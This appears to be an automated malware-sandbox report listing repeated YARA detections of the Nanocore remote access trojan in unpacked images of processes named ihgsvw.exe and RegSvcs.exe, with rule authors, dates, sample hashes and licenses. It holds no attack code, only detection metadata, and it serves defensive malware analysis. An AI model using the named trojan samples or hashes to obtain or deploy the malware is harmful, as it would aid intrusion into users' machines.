Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
